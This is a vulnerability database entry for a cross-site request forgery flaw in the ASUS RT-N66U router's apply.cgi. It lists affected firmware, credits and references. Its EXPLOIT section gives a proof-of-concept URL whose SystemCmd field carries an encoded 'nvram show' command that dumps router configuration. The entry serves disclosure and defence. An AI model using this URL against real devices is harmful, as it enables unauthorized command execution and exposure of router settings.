ID

VAR-E-201309-0005


TITLE

ASUS RT-N66U 'apply.cgi' Cross Site Request Forgery Vulnerability

Trust: 0.3

sources: BID: 62726

DESCRIPTION

ASUS RT-N66U is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
ASUS RT-N66U 3.0.0.4.374_720 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 62726

AFFECTED PRODUCTS

vendor: asus | model: rt-n66u 3.0.0.4.374 720 | scope: - | version: -

Trust: 0.3

sources: BID: 62726

EXPLOIT

To exploit the issue, an attacker must entice a user into visiting a malicious site.
The following example URL is available:
http://www.example.com/apply.cgi?current_page=Main_Analysis_Content.asp&next_page=cmdRet_check.htm&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=%6e%76%72%61%6d%20%73%68%6f%77&firmver=3.0.0.4&cmdMethod=ping&destIP=www.example1.com&pingCNT=5

Trust: 0.3

sources: BID: 62726

PRICE

Free

Trust: 0.3

sources: BID: 62726

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 62726

CREDITS

cgcai

Trust: 0.3

sources: BID: 62726

EXTERNAL IDS

db: BID | id: 62726

Trust: 0.3

sources: BID: 62726

REFERENCES

url:https://www.qxcg.net/arbitrary-command-execution-on-an-asus-rtn66u.html

Trust: 0.3

url:http://www.asus.com/networking/rtn66u/

Trust: 0.3

sources: BID: 62726

SOURCES

db: BID | id: 62726

LAST UPDATE DATE

2022-07-27T09:21:57.584000+00:00


SOURCES UPDATE DATE

db: BID | id: 62726 | date: 2013-09-30T00:00:00

SOURCES RELEASE DATE

db: BID | id: 62726 | date: 2013-09-30T00:00:00